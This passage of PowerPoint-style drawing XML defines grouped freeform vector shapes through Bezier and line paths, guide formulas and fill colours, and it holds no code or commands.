                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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85" name="Freeform 697"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3938" y="3898"/>
                  <a:ext cx="24" cy="390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 12 h 165"/>
                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="6350" cap="rnd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42" name="Group 698"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3612" y="2946"/>
                <a:ext cx="635" cy="270"/>
                <a:chOff x="-1652" y="6058"/>
                <a:chExt cx="2253" cy="954"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="660" name="Freeform 699"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="150" y="6058"/>
                  <a:ext cx="451" cy="590"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 590"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 470 h 590"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 590 h 590"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 123 h 590"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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1" h="590">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="590"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451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1" name="Freeform 700"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-752" y="6256"/>
                  <a:ext cx="1353" cy="362"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1353"/>
                    <a:gd name="T1" fmla="*/ 241 h 362"/>
                    <a:gd name="T2" fmla="*/ 902 w 1353"/>
                    <a:gd name="T3" fmla="*/ 0 h 362"/>
                    <a:gd name="T4" fmla="*/ 1353 w 1353"/>
                    <a:gd name="T5" fmla="*/ 121 h 362"/>
                    <a:gd name="T6" fmla="*/ 454 w 1353"/>
                    <a:gd name="T7" fmla="*/ 362 h 362"/>
                    <a:gd name="T8" fmla="*/ 0 w 1353"/>
                    <a:gd name="T9" fmla="*/ 241 h 3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3" h="362">
                      <a:moveTo>
                        <a:pt x="0" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="902" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1353" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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2" name="Freeform 701"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-298" y="6181"/>
                  <a:ext cx="899" cy="708"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 899"/>
                    <a:gd name="T1" fmla="*/ 241 h 708"/>
                    <a:gd name="T2" fmla="*/ 0 w 899"/>
                    <a:gd name="T3" fmla="*/ 708 h 708"/>
                    <a:gd name="T4" fmla="*/ 899 w 899"/>
                    <a:gd name="T5" fmla="*/ 467 h 708"/>
                    <a:gd name="T6" fmla="*/ 899 w 899"/>
                    <a:gd name="T7" fmla="*/ 0 h 708"/>
                    <a:gd name="T8" fmla="*/ 0 w 899"/>
                    <a:gd name="T9" fmla="*/ 241 h 7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99" h="708">
                      <a:moveTo>
                        <a:pt x="0" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="708"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="899" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="899" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="CCFFCC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3" name="Freeform 702"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-750" y="6353"/>
                  <a:ext cx="452" cy="536"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 452"/>
                    <a:gd name="T1" fmla="*/ 0 h 536"/>
                    <a:gd name="T2" fmla="*/ 196 w 452"/>
                    <a:gd name="T3" fmla="*/ 196 h 536"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 144 h 536"/>
                    <a:gd name="T6" fmla="*/ 0 w 452"/>
                    <a:gd name="T7" fmla="*/ 416 h 536"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 536 h 536"/>
                    <a:gd name="T10" fmla="*/ 452 w 452"/>
                    <a:gd name="T11" fmla="*/ 69 h 536"/>
                    <a:gd name="T12" fmla="*/ 196 w 452"/>
                    <a:gd name="T13" fmla="*/ 0 h 5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52" h="536">
                      <a:moveTo>
                        <a:pt x="196" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="196" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="144"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="416"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19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4" name="Freeform 703"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-554" y="6058"/>
                  <a:ext cx="1155" cy="364"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 707 w 1155"/>
                    <a:gd name="T1" fmla="*/ 0 h 364"/>
                    <a:gd name="T2" fmla="*/ 452 w 1155"/>
                    <a:gd name="T3" fmla="*/ 68 h 364"/>
                    <a:gd name="T4" fmla="*/ 645 w 1155"/>
                    <a:gd name="T5" fmla="*/ 123 h 364"/>
                    <a:gd name="T6" fmla="*/ 0 w 1155"/>
                    <a:gd name="T7" fmla="*/ 295 h 364"/>
                    <a:gd name="T8" fmla="*/ 256 w 1155"/>
                    <a:gd name="T9" fmla="*/ 364 h 364"/>
                    <a:gd name="T10" fmla="*/ 1155 w 1155"/>
                    <a:gd name="T11" fmla="*/ 123 h 364"/>
                    <a:gd name="T12" fmla="*/ 707 w 1155"/>
                    <a:gd name="T13" fmla="*/ 0 h 3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55" h="364">
                      <a:moveTo>
                        <a:pt x="707" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="452" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="645" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="295"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="256" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1155" y="123"/>
                      </a:ln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777777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5" name="Freeform 704"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1652" y="6233"/>
                  <a:ext cx="454" cy="536"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 255 w 454"/>
                    <a:gd name="T1" fmla="*/ 0 h 536"/>
                    <a:gd name="T2" fmla="*/ 258 w 454"/>
                    <a:gd name="T3" fmla="*/ 196 h 536"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 144 h 536"/>
                    <a:gd name="T6" fmla="*/ 454 w 454"/>
                    <a:gd name="T7" fmla="*/ 415 h 536"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 536 h 536"/>
                    <a:gd name="T10" fmla="*/ 0 w 454"/>
                    <a:gd name="T11" fmla="*/ 68 h 536"/>
                    <a:gd name="T12" fmla="*/ 255 w 454"/>
                    <a:gd name="T13" fmla="*/ 0 h 5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54" h="536">
                      <a:moveTo>
                        <a:pt x="255" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="258" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="144"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25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6" name="Freeform 705"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1652" y="6377"/>
                  <a:ext cx="1354" cy="363"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T1" fmla="*/ 241 h 363"/>
                    <a:gd name="T2" fmla="*/ 454 w 1354"/>
                    <a:gd name="T3" fmla="*/ 0 h 363"/>
                    <a:gd name="T4" fmla="*/ 0 w 1354"/>
                    <a:gd name="T5" fmla="*/ 120 h 363"/>
                    <a:gd name="T6" fmla="*/ 902 w 1354"/>
                    <a:gd name="T7" fmla="*/ 363 h 363"/>
                    <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T9" fmla="*/ 241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4" h="363">
                      <a:moveTo>
                        <a:pt x="1354" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="902" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="2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7" name="Freeform 706"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1652" y="6233"/>
                  <a:ext cx="1354" cy="309"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1157 w 1354"/>
                    <a:gd name="T1" fmla="*/ 240 h 309"/>
                    <a:gd name="T2" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T3" fmla="*/ 189 h 309"/>
                    <a:gd name="T4" fmla="*/ 1098 w 1354"/>
                    <a:gd name="T5" fmla="*/ 120 h 309"/>
                    <a:gd name="T6" fmla="*/ 900 w 1354"/>
                    <a:gd name="T7" fmla="*/ 172 h 309"/>
                    <a:gd name="T8" fmla="*/ 255 w 1354"/>
                    <a:gd name="T9" fmla="*/ 0 h 309"/>
                    <a:gd name="T10" fmla="*/ 0 w 1354"/>
                    <a:gd name="T11" fmla="*/ 68 h 309"/>
                    <a:gd name="T12" fmla="*/ 902 w 1354"/>
                    <a:gd name="T13" fmla="*/ 309 h 309"/>
                    <a:gd name="T14" fmla="*/ 1157 w 1354"/>
                    <a:gd name="T15" fmla="*/ 240 h 3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54" h="309">
                      <a:moveTo>
                        <a:pt x="1157" y="240"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1354" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1098" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="900" y="172"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="902" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1157" y="240"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="777777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8" name="Freeform 707"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1652" y="6301"/>
                  <a:ext cx="902" cy="709"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 902 w 902"/>
                    <a:gd name="T1" fmla="*/ 241 h 709"/>
                    <a:gd name="T2" fmla="*/ 900 w 902"/>
                    <a:gd name="T3" fmla="*/ 709 h 709"/>
                    <a:gd name="T4" fmla="*/ 0 w 902"/>
                    <a:gd name="T5" fmla="*/ 468 h 709"/>
                    <a:gd name="T6" fmla="*/ 0 w 902"/>
                    <a:gd name="T7" fmla="*/ 0 h 709"/>
                    <a:gd name="T8" fmla="*/ 902 w 902"/>
                    <a:gd name="T9" fmla="*/ 241 h 7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02" h="709">
                      <a:moveTo>
                        <a:pt x="902" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="900" y="709"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="902" y="241"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="CCFFCC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69" name="Freeform 708"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-752" y="6422"/>
                  <a:ext cx="454" cy="590"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 257 w 454"/>
                    <a:gd name="T1" fmla="*/ 51 h 590"/>
                    <a:gd name="T2" fmla="*/ 454 w 454"/>
                    <a:gd name="T3" fmla="*/ 0 h 590"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 196 h 590"/>
                    <a:gd name="T6" fmla="*/ 454 w 454"/>
                    <a:gd name="T7" fmla="*/ 467 h 590"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 590 h 590"/>
                    <a:gd name="T10" fmla="*/ 2 w 454"/>
                    <a:gd name="T11" fmla="*/ 120 h 590"/>
                    <a:gd name="T12" fmla="*/ 257 w 454"/>
                    <a:gd name="T13" fmla="*/ 51 h 5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54" h="590">
                      <a:moveTo>
                        <a:pt x="257" y="51"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="590"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="51"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="CCFFCC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43" name="Group 709"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3650" y="2910"/>
                <a:ext cx="133" cy="318"/>
                <a:chOff x="3735" y="3265"/>
                <a:chExt cx="468" cy="1120"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="644" name="Freeform 710"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3853" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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45" name="Freeform 711"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3853" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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46" name="Freeform 712"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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47" name="Freeform 713"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
